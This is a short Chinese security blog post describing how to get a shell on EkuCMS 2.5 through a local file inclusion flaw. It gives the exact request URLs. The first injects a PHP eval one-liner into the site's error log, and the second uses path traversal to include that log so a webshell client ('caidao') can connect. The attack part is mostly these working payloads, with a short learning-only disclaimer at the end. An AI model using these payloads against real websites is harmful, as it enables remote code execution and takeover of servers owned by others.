易酷cms本地包含漏洞拿shell

  • 内容
  • 相关
测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

1.png

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

2.png

错误日志内容

3.png
包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/\..\temp\logs\17_12_02.log

4.png
直接用菜刀连接

5.png
成功

6.png


查看原文

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:易酷cms本地包含漏洞拿shell - https://www.0dayhack.com/post-740.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注